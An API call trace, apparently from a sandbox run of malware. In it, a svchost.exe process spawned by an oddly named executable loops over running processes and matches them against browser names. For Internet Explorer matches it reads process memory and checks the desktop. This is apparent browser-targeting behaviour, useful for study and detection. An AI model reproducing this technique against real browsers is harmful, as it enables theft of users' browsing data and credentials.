	[0210.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.359] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.359] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0210.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.359] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.359] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0210.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3710
	[0210.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.360] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0210.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.361] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.361] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0210.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.361] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0210.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3714
	[0210.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.363] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0210.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.363] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.363] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0210.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.364] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.364] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0210.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3718
	[0210.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.365] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0210.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.365] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.365] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0210.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.366] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0210.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x371c
	[0210.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.367] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0210.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.367] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.367] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0210.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.367] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.368] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0210.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3720
	[0210.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.368] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0210.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.369] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.369] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0210.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.370] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.370] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0210.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3724
	[0210.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.371] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0210.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.371] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.372] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0210.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.373] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.373] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0210.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3728
	[0210.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.374] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0210.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.374] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.375] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0210.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.375] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.375] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0210.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x372c
	[0210.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.376] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0210.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.377] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.377] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0210.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.378] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.379] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0210.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3730
	[0210.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.379] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0210.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.380] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.380] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0210.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.381] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.381] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3734
	[0210.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.382] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.383] NtQueryInformationProcess (in: ProcessHandle=0x3734, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.383] ReadProcessMemory (in: hProcess=0x3734, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.383] ReadProcessMemory (in: hProcess=0x3734, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.384] ReadProcessMemory (in: hProcess=0x3734, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.384] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.384] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3738
	[0210.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.385] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.385] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.385] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.385] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.386] NtQueryInformationProcess (in: ProcessHandle=0x3738, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.386] ReadProcessMemory (in: hProcess=0x3738, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.386] ReadProcessMemory (in: hProcess=0x3738, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.386] ReadProcessMemory (in: hProcess=0x3738, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.386] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.386] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x373c
	[0210.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.387] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.387] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.387] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.388] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.388] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0210.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3740
	[0210.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.389] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0210.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.389] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.389] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0210.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.390] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.390] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3744
	[0210.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.391] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.391] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.391] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.392] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.392] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.392] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3748
	[0210.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.393] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.394] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.394] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.394] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.394] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0210.395] CloseHandle (hObject=0x188) returned 1
	[0210.395] Sleep (dwMilliseconds=0x64) 
	[0210.492] GetCurrentProcessId () returned 0x110
	[0210.492] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0210.497] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0210.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0210.499] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0210.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x374c
	[0210.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.501] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.502] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.502] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.503] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.503] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3750
	[0210.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.505] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.505] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.505] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.506] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0210.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3754
	[0210.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.507] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0210.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.507] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.508] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0210.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.508] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.508] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3758
	[0210.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.509] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.509] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.510] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.510] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0210.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x375c
	[0210.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.511] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0210.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.511] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.512] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0210.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.512] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0210.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3760
	[0210.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.513] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0210.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.514] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.514] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0210.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.514] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
